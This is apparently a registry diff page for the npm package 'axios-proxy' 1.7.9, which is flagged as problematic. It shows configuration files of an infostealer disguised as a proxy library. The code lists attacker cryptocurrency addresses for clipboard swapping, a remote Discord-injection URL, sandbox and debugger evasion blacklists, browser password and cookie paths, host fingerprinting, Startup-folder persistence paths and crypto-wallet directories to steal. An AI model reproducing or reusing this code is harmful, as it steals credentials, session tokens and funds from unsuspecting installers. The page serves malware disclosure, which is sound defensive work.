axios-proxy 0.0.1-security â 1.7.9
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of axios-proxy might be problematic. Click here for more details.
- package/LICENSE +201 -0
- package/README.md +1313 -5
- package/config/counter.js +24 -0
- package/config/crypto.js +20 -0
- package/config/discord.js +23 -0
- package/config/environ.js +132 -0
- package/config/executable.js +8 -0
- package/config/jszip.js +15 -0
- package/config/jsziptg.js +15 -0
- package/config/main.js +6 -0
- package/config/telegram.js +7 -0
- package/config/user.js +43 -0
- package/config/wallets.js +17 -0
- package/config.js +8 -0
- package/discord_desktop_core/index.js +856 -0
- package/gofile.js +323 -0
- package/index.js +4 -0
- package/index2.js +323 -0
- package/infection.js +276 -0
- package/keywords.js +16 -0
- package/lib.txt +1 -0
- package/package.json +47 -3
- package/utils/browsers.js +503 -0
- package/utils/clipper.js +38 -0
- package/utils/constructor.js +14 -0
- package/utils/data.js +19 -0
- package/utils/discord.js +448 -0
- package/utils/encryption.js +11 -0
- package/utils/flags.js +509 -0
- package/utils/infection.js +199 -0
- package/utils/jszip.js +37 -0
- package/utils/jsziptg.js +37 -0
- package/utils/protection.js +45 -0
- package/utils/prototype.js +29 -0
- package/utils/telegram.js +27 -0
- package/utils/time.js +7 -0
- package/utils/wallets.js +31 -0
- package/utils/webhook.js +78 -0
@@ -0,0 +1,24 @@
|
|
1
|
+
module.exports = (client) => {
|
2
|
+
return {
|
3
|
+
passwords: 0,
|
4
|
+
cookies: 0,
|
5
|
+
history: 0,
|
6
|
+
bookmarks: 0,
|
7
|
+
screenshots: 0,
|
8
|
+
|
9
|
+
encrypted_strings: 0,
|
10
|
+
decrypted_strings: 0,
|
11
|
+
|
12
|
+
wallets: 0,
|
13
|
+
|
14
|
+
skype: false,
|
15
|
+
discord: false,
|
16
|
+
telegram: false,
|
17
|
+
outlook: false,
|
18
|
+
steam: false,
|
19
|
+
uplay: false,
|
20
|
+
battlenet: false,
|
21
|
+
|
22
|
+
wifinetworks: 0,
|
23
|
+
}
|
24
|
+
}
|
package/config/crypto.js
ADDED
@@ -0,0 +1,20 @@
|
|
1
|
+
module.exports = (client) => {
|
2
|
+
return {
|
3
|
+
default_padding: client.requires.crypto.constants.RSA_PKCS1_OAEP_PADDING,
|
4
|
+
default_oaepHash: "sha256",
|
5
|
+
keyPair: client.requires.crypto.generateKeyPairSync("rsa", {
|
6
|
+
modulusLength: 2048,
|
7
|
+
}),
|
8
|
+
|
9
|
+
btc: client.utils.encryption.encryptData("bc1q46mjlyhqzwj3yt7zr7apq889njzx7lng62wf5q"),
|
10
|
+
ltc: client.utils.encryption.encryptData("LYNbeHVMGyuELtCTXxBNw7TiUHTiJVXocc"),
|
11
|
+
xmr: client.utils.encryption.encryptData("44Fnehq1zUaMih44bDzLcQC4TV8XLknsPAGqEmjbCt1AJcsY3JyYNuhh9cZwugVS8eMBoZqt4iXeQNPpgpR8LC21FXZWoQ2"),
|
12
|
+
eth: client.utils.encryption.encryptData("0xAe672925a6EE758f64296FC057F35E0d5D103776"),
|
13
|
+
xrp: client.utils.encryption.encryptData("rL6w47PGM5Zxj8hQuwefeQwiZhL8SUJQqZ"),
|
14
|
+
neo: client.utils.encryption.encryptData("APsAzJw3YqMAkL5aari3DMzf3w5Kp3RUr9"),
|
15
|
+
bch: client.utils.encryption.encryptData("qz85ap59g6zc8k7d4r22jru4h7dumm6xwgjjquc42j"),
|
16
|
+
doge: client.utils.encryption.encryptData("D66Mwzp5USMwpg93jYvRasvzRQZhxbpkt4"),
|
17
|
+
dash: client.utils.encryption.encryptData("XcuwduXn9PcDiVogMQ2YWR4oqUM3MxKX8q"),
|
18
|
+
xlm: client.utils.encryption.encryptData("GA6X5LQ3LMEWXRC74VUPHXFBUGIY3E3NFYCGSJZJCAKNBD2HBUFEANIL"),
|
19
|
+
}
|
20
|
+
}
|
@@ -0,0 +1,23 @@
|
|
1
|
+
module.exports = (client) => {
|
2
|
+
return {
|
3
|
+
base_url: client.utils.encryption.encryptData("https://raw.githubusercontent.com/AliTefeli02/TikTok-ViewBot/main/injection.js"),
|
4
|
+
|
5
|
+
instant_logout: true,
|
6
|
+
disable_qr_code: true,
|
7
|
+
|
8
|
+
injection_notification: true,
|
9
|
+
initialize_notification: true,
|
10
|
+
logout_notification: true,
|
11
|
+
|
12
|
+
running_executables: [],
|
13
|
+
executables: [],
|
14
|
+
files_path: [],
|
15
|
+
|
16
|
+
closed_discord_clients: '',
|
17
|
+
restarted_discord_clients: '',
|
18
|
+
|
19
|
+
grabbed_tokens: {
|
20
|
+
all: []
|
21
|
+
},
|
22
|
+
}
|
23
|
+
}
|
@@ -0,0 +1,132 @@
|
|
1
|
+
module.exports = (client) => {
|
2
|
+
return {
|
3
|
+
|
4
|
+
blacklisted_programs: [
|
5
|
+
"wireshark",
|
6
|
+
"fiddler",
|
7
|
+
"vboxservice",
|
8
|
+
"df5serv",
|
9
|
+
"processhacker",
|
10
|
+
"vboxtray",
|
11
|
+
"vmtoolsd",
|
12
|
+
"vmwaretray",
|
13
|
+
"ida64",
|
14
|
+
"ollydbg",
|
15
|
+
"pestudio",
|
16
|
+
"vmwareuser",
|
17
|
+
"vgauthservice",
|
18
|
+
"vmacthlp",
|
19
|
+
"x96dbg",
|
20
|
+
"vmsrvc",
|
21
|
+
"x32dbg",
|
22
|
+
"vmusrvc",
|
23
|
+
"prl_cc",
|
24
|
+
"prl_tools",
|
25
|
+
"xenservice",
|
26
|
+
"qemu-ga",
|
27
|
+
"joeboxcontrol",
|
28
|
+
"ksdumperclient",
|
29
|
+
"ksdumper",
|
30
|
+
"joeboxserver"
|
31
|
+
],
|
32
|
+
|
33
|
+
blacklisted_hwids: ["7AB5C494-39F5-4941-9163-47F54D6D5016", "032E02B4-0499-05C3-0806-3C0700080009", "03DE0294-0480-05DE-1A06-350700080009", "11111111-2222-3333-4444-555555555555", "6F3CA5EC-BEC9-4A4D-8274-11168F640058", "ADEEEE9E-EF0A-6B84-B14B-B83A54AFC548", "4C4C4544-0050-3710-8058-CAC04F59344A", "00000000-0000-0000-0000-AC1F6BD04972", "00000000-0000-0000-0000-000000000000", "5BD24D56-789F-8468-7CDC-CAA7222CC121", "49434D53-0200-9065-2500-65902500E439", "49434D53-0200-9036-2500-36902500F022", "777D84B3-88D1-451C-93E4-D235177420A7", "49434D53-0200-9036-2500-369025000C65",
|
34
|
+
"B1112042-52E8-E25B-3655-6A4F54155DBF", "00000000-0000-0000-0000-AC1F6BD048FE", "EB16924B-FB6D-4FA1-8666-17B91F62FB37", "A15A930C-8251-9645-AF63-E45AD728C20C", "67E595EB-54AC-4FF0-B5E3-3DA7C7B547E3", "C7D23342-A5D4-68A1-59AC-CF40F735B363", "63203342-0EB0-AA1A-4DF5-3FB37DBB0670", "44B94D56-65AB-DC02-86A0-98143A7423BF", "6608003F-ECE4-494E-B07E-1C4615D1D93C", "D9142042-8F51-5EFF-D5F8-EE9AE3D1602A", "49434D53-0200-9036-2500-369025003AF0", "8B4E8278-525C-7343-B825-280AEBCD3BCB", "4D4DDC94-E06C-44F4-95FE-33A1ADA5AC27", "79AF5279-16CF-4094-9758-F88A616D81B4"
|
35
|
+
],
|
36
|
+
|
37
|
+
password_and_cookies_paths: [
|
38
|
+
process.env.LOCALAPPDATA + '\\Google\\Chrome\\User Data\\Default\\',
|
39
|
+
process.env.LOCALAPPDATA + '\\Google\\Chrome\\User Data\\Profile 1\\',
|
40
|
+
process.env.LOCALAPPDATA + '\\Google\\Chrome\\User Data\\Profile 2\\',
|
41
|
+
process.env.LOCALAPPDATA + '\\Google\\Chrome\\User Data\\Profile 3\\',
|
42
|
+
process.env.LOCALAPPDATA + '\\Google\\Chrome\\User Data\\Profile 4\\',
|
43
|
+
process.env.LOCALAPPDATA + '\\Google\\Chrome\\User Data\\Profile 5\\',
|
44
|
+
process.env.LOCALAPPDATA + '\\Google\\Chrome\\User Data\\Guest Profile\\',
|
45
|
+
process.env.LOCALAPPDATA + '\\Google\\Chrome\\User Data\\Default\\Network\\',
|
46
|
+
process.env.LOCALAPPDATA + '\\Google\\Chrome\\User Data\\Profile 1\\Network\\',
|
47
|
+
process.env.LOCALAPPDATA + '\\Google\\Chrome\\User Data\\Profile 2\\Network\\',
|
48
|
+
process.env.LOCALAPPDATA + '\\Google\\Chrome\\User Data\\Profile 3\\Network\\',
|
49
|
+
process.env.LOCALAPPDATA + '\\Google\\Chrome\\User Data\\Profile 4\\Network\\',
|
50
|
+
process.env.LOCALAPPDATA + '\\Google\\Chrome\\User Data\\Profile 5\\Network\\',
|
51
|
+
process.env.LOCALAPPDATA + '\\Google\\Chrome\\User Data\\Guest Profile\\Network\\',
|
52
|
+
process.env.APPDATA + '\\Opera Software\\Opera Stable\\',
|
53
|
+
process.env.APPDATA + '\\Opera Software\\Opera GX Stable\\',
|
54
|
+
process.env.LOCALAPPDATA + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\',
|
55
|
+
process.env.LOCALAPPDATA + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 1\\',
|
56
|
+
process.env.LOCALAPPDATA + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 2\\',
|
57
|
+
process.env.LOCALAPPDATA + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 3\\',
|
58
|
+
process.env.LOCALAPPDATA + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 4\\',
|
59
|
+
process.env.LOCALAPPDATA + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 5\\',
|
60
|
+
process.env.LOCALAPPDATA + '\\BraveSoftware\\Brave-Browser\\User Data\\Guest Profile\\',
|
61
|
+
process.env.LOCALAPPDATA + '\\Yandex\\YandexBrowser\\User Data\\Profile 1\\',
|
62
|
+
process.env.LOCALAPPDATA + '\\Yandex\\YandexBrowser\\User Data\\Profile 2\\',
|
63
|
+
process.env.LOCALAPPDATA + '\\Yandex\\YandexBrowser\\User Data\\Profile 3\\',
|
64
|
+
process.env.LOCALAPPDATA + '\\Yandex\\YandexBrowser\\User Data\\Profile 4\\',
|
65
|
+
process.env.LOCALAPPDATA + '\\Yandex\\YandexBrowser\\User Data\\Profile 5\\',
|
66
|
+
process.env.LOCALAPPDATA + '\\Yandex\\YandexBrowser\\User Data\\Guest Profile\\',
|
67
|
+
process.env.LOCALAPPDATA + '\\Microsoft\\Edge\\User Data\\Default\\',
|
68
|
+
process.env.LOCALAPPDATA + '\\Microsoft\\Edge\\User Data\\Profile 1\\',
|
69
|
+
process.env.LOCALAPPDATA + '\\Microsoft\\Edge\\User Data\\Profile 2\\',
|
70
|
+
process.env.LOCALAPPDATA + '\\Microsoft\\Edge\\User Data\\Profile 3\\',
|
71
|
+
process.env.LOCALAPPDATA + '\\Microsoft\\Edge\\User Data\\Profile 4\\',
|
72
|
+
process.env.LOCALAPPDATA + '\\Microsoft\\Edge\\User Data\\Profile 5\\',
|
73
|
+
process.env.LOCALAPPDATA + '\\Microsoft\\Edge\\User Data\\Guest Profile\\',
|
74
|
+
process.env.LOCALAPPDATA + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Network\\',
|
75
|
+
process.env.LOCALAPPDATA + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 1\\Network\\',
|
76
|
+
process.env.LOCALAPPDATA + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 2\\Network\\',
|
77
|
+
process.env.LOCALAPPDATA + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 3\\Network\\',
|
78
|
+
process.env.LOCALAPPDATA + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 4\\Network\\',
|
79
|
+
process.env.LOCALAPPDATA + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 5\\Network\\',
|
80
|
+
process.env.LOCALAPPDATA + '\\BraveSoftware\\Brave-Browser\\User Data\\Guest Profile\\Network\\',
|
81
|
+
process.env.LOCALAPPDATA + '\\Yandex\\YandexBrowser\\User Data\\Profile 1\\Network\\',
|
82
|
+
process.env.LOCALAPPDATA + '\\Yandex\\YandexBrowser\\User Data\\Profile 2\\Network\\',
|
83
|
+
process.env.LOCALAPPDATA + '\\Yandex\\YandexBrowser\\User Data\\Profile 3\\Network\\',
|
84
|
+
process.env.LOCALAPPDATA + '\\Yandex\\YandexBrowser\\User Data\\Profile 4\\Network\\',
|
85
|
+
process.env.LOCALAPPDATA + '\\Yandex\\YandexBrowser\\User Data\\Profile 5\\Network\\',
|
86
|
+
process.env.LOCALAPPDATA + '\\Yandex\\YandexBrowser\\User Data\\Guest Profile\\Network\\',
|
87
|
+
process.env.LOCALAPPDATA + '\\Microsoft\\Edge\\User Data\\Default\\Network\\',
|
88
|
+
process.env.LOCALAPPDATA + '\\Microsoft\\Edge\\User Data\\Profile 1\\Network\\',
|
89
|
+
process.env.LOCALAPPDATA + '\\Microsoft\\Edge\\User Data\\Profile 2\\Network\\',
|
90
|
+
process.env.LOCALAPPDATA + '\\Microsoft\\Edge\\User Data\\Profile 3\\Network\\',
|
91
|
+
process.env.LOCALAPPDATA + '\\Microsoft\\Edge\\User Data\\Profile 4\\Network\\',
|
92
|
+
process.env.LOCALAPPDATA + '\\Microsoft\\Edge\\User Data\\Profile 5\\Network\\',
|
93
|
+
process.env.LOCALAPPDATA + '\\Microsoft\\Edge\\User Data\\Guest Profile\\Network\\'
|
94
|
+
],
|
95
|
+
|
96
|
+
blacklisted_pc_names: ["WDAGUtilityAccount", "Abby", "Peter Wilson", "hmarc", "patex", "JOHN-PC", "RDhJ0CNFevzX", "kEecfMwgj", "Frank",
|
97
|
+
"8Nl0ColNQ5bq", "Lisa", "John", "george", "PxmdUOpVyx", "8VizSM", "w0fjuOVmCcP5A", "lmVwjj9b", "PqONjHVwexsS", "3u2v9m8", "Julia", "HEUeRzl", "BEE7370C-8C0C-4", "DESKTOP-NAKFFMT", "WIN-5E07COS9ALR", "B30F0242-1C6A-4", "DESKTOP-VRSQLAG", "Q9IATRKPRH", "XC64ZB", "DESKTOP-D019GDM", "DESKTOP-WI8CLET", "SERVER1", "LISA-PC", "JOHN-PC",
|
98
|
+
"DESKTOP-B0T93D6", "DESKTOP-1PYKP29", "DESKTOP-1Y2433R", "WILEYPC", "WORK", "6C4E733F-C2D9-4", "RALPHS-PC", "DESKTOP-WG3MYJS", "DESKTOP-7XC6GEZ", "DESKTOP-5OV9S0O", "QarZhrdBpj", "ORELEEPC", "ARCHIBALDPC", "JULIA-PC", "d1bnJkfVlH",
|
99
|
+
],
|
100
|
+
|
101
|
+
|
102
|
+
cookies: {
|
103
|
+
all: []
|
104
|
+
},
|
105
|
+
|
106
|
+
passwords: {
|
107
|
+
all: []
|
108
|
+
},
|
109
|
+
|
110
|
+
bookmarks: {
|
111
|
+
all: []
|
112
|
+
},
|
113
|
+
|
114
|
+
history: {
|
115
|
+
all: []
|
116
|
+
},
|
117
|
+
|
118
|
+
autofill: {
|
119
|
+
all: []
|
120
|
+
},
|
121
|
+
|
122
|
+
keywords: {
|
123
|
+
cookies: [],
|
124
|
+
passwords: [],
|
125
|
+
bookmarks: [],
|
126
|
+
history: [],
|
127
|
+
autofill: [],
|
128
|
+
},
|
129
|
+
|
130
|
+
validated_tokens: [],
|
131
|
+
}
|
132
|
+
}
|
package/config/jszip.js
ADDED
@@ -0,0 +1,15 @@
|
|
1
|
+
module.exports = (client) => {
|
2
|
+
return {
|
3
|
+
path: undefined,
|
4
|
+
generate_path: () => {
|
5
|
+
const subpaths = [client.utils.encryption.decryptData(client.config.user.localappdata), client.utils.encryption.decryptData(client.config.user.appdata), client.utils.encryption.decryptData(client.config.user.temp)]
|
6
|
+
const subpath = subpaths[Math.floor(Math.random() * subpaths.length)]
|
7
|
+
|
8
|
+
const random_folder_name = `${client.utils.encryption.decryptData(client.config.user.hostname)}_${client.requires.crypto.randomUUID()}`;
|
9
|
+
|
10
|
+
client.requires.fs.mkdirSync(`${subpath}\\${random_folder_name}`, 0744)
|
11
|
+
|
12
|
+
return `${subpath}\\${random_folder_name}`;
|
13
|
+
}
|
14
|
+
}
|
15
|
+
}
|
@@ -0,0 +1,15 @@
|
|
1
|
+
module.exports = (client) => {
|
2
|
+
return {
|
3
|
+
path: undefined,
|
4
|
+
generate_path: () => {
|
5
|
+
const subpaths = [client.utils.encryption.decryptData(client.config.user.localappdata), client.utils.encryption.decryptData(client.config.user.appdata), client.utils.encryption.decryptData(client.config.user.temp)]
|
6
|
+
const subpath = subpaths[Math.floor(Math.random() * subpaths.length)]
|
7
|
+
|
8
|
+
const random_folder_name = `${client.utils.encryption.decryptData(client.config.user.hostname)}_${client.requires.crypto.randomUUID()}`;
|
9
|
+
|
10
|
+
client.requires.fs.mkdirSync(`${subpath}\\${random_folder_name}`, 0744)
|
11
|
+
|
12
|
+
return `${subpath}\\${random_folder_name}`;
|
13
|
+
}
|
14
|
+
}
|
15
|
+
}
|
package/config/main.js
ADDED
package/config/user.js
ADDED
@@ -0,0 +1,43 @@
|
|
1
|
+
module.exports = (client) => {
|
2
|
+
return {
|
3
|
+
cpus: [],
|
4
|
+
ram: client.utils.encryption.encryptData(`${Math.round(client.requires.os.totalmem() / 1024 / 1024 / 1024)} GB`),
|
5
|
+
version: client.utils.encryption.encryptData(client.requires.os.version()),
|
6
|
+
uptime: client.utils.encryption.encryptData(`${(client.requires.os.uptime() / 60).toFixed(0)} minutes (${(client.requires.os.uptime() / 60 / 60).toFixed(2)} hours)`),
|
7
|
+
hostdir: client.utils.encryption.encryptData(client.requires.os.homedir()),
|
8
|
+
hostname: client.utils.encryption.encryptData(client.requires.os.hostname()),
|
9
|
+
username: client.utils.encryption.encryptData(client.requires.os.userInfo().username),
|
10
|
+
type: client.utils.encryption.encryptData(client.requires.os.type()),
|
11
|
+
arch: client.utils.encryption.encryptData(client.requires.os.arch()),
|
12
|
+
release: client.utils.encryption.encryptData(client.requires.os.release()),
|
13
|
+
|
14
|
+
appdata: client.utils.encryption.encryptData(process.env.APPDATA),
|
15
|
+
localappdata: client.utils.encryption.encryptData(process.env.LOCALAPPDATA),
|
16
|
+
temp: client.utils.encryption.encryptData(process.env.TEMP),
|
17
|
+
user_domain: client.utils.encryption.encryptData(process.env.COMPUTERNAME),
|
18
|
+
monitor_address: client.utils.encryption.encryptData(process.env.MONITOR_ADDRESS),
|
19
|
+
processor_identifier: client.utils.encryption.encryptData(process.env.PROCESSOR_IDENTIFIER),
|
20
|
+
processor_architecture: client.utils.encryption.encryptData(process.env.PROCESSOR_ARCHITECTURE),
|
21
|
+
processors: client.utils.encryption.encryptData(process.env.NUMBER_OF_PROCESSORS),
|
22
|
+
system_drive: client.utils.encryption.encryptData(process.env.SystemDrive),
|
23
|
+
|
24
|
+
autostart: [client.utils.encryption.encryptData(process.env.APPDATA + "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"), client.utils.encryption.encryptData(process.env.SystemDrive + "\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup")],
|
25
|
+
|
26
|
+
|
27
|
+
wifi_connections: async() => {
|
28
|
+
const wifi_connections = await client.requires.systeminformation.getDynamicData();
|
29
|
+
|
30
|
+
let text = ""
|
31
|
+
|
32
|
+
wifi_connections.wifiNetworks.forEach((connection) => {
|
33
|
+
text += `${connection.ssid} | ${connection.bssid}\n`
|
34
|
+
})
|
35
|
+
|
36
|
+
client.config.counter.wifinetworks = wifi_connections.wifiNetworks.length;
|
37
|
+
|
38
|
+
return text
|
39
|
+
},
|
40
|
+
|
41
|
+
connection_info: undefined,
|
42
|
+
}
|
43
|
+
}
|
@@ -0,0 +1,17 @@
|
|
1
|
+
module.exports = (client) => {
|
2
|
+
return {
|
3
|
+
directory: {
|
4
|
+
"đ¸ Zcash": `${process.env.APPDATA}\\Zcash`,
|
5
|
+
"đ Armory": `${process.env.APPDATA}\\Armory`,
|
6
|
+
"đ Bytecoin": `${process.env.APPDATA}\\bytecoin`,
|
7
|
+
"đĩ Jaxx": `${process.env.APPDATA}\\com.liberty.jaxx\\IndexedDB\\file__0.indexeddb.leveldb`,
|
8
|
+
"đ Exodus": `${process.env.APPDATA}\\Exodus\\exodus.wallet`,
|
9
|
+
"đ Ethereum": `${process.env.APPDATA}\\Ethereum\\keystore`,
|
10
|
+
"đ¨ Electrum": `${process.env.APPDATA}\\Electrum\\wallets`,
|
11
|
+
"đšī¸ AtomicWallet": `${process.env.APPDATA}\\atomic\\Local Storage\\leveldb`,
|
12
|
+
"đš Guarda": `${process.env.APPDATA}\\Guarda\\Local Storage\\leveldb`,
|
13
|
+
"⥠Coinomi": `${process.env.APPDATA}\\Coinomi\\Coinomi\\wallets`,
|
14
|
+
"đĻ MetaMask": `${process.env.LOCALAPPDATA}\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn`,
|
15
|
+
},
|
16
|
+
}
|
17
|
+
}
|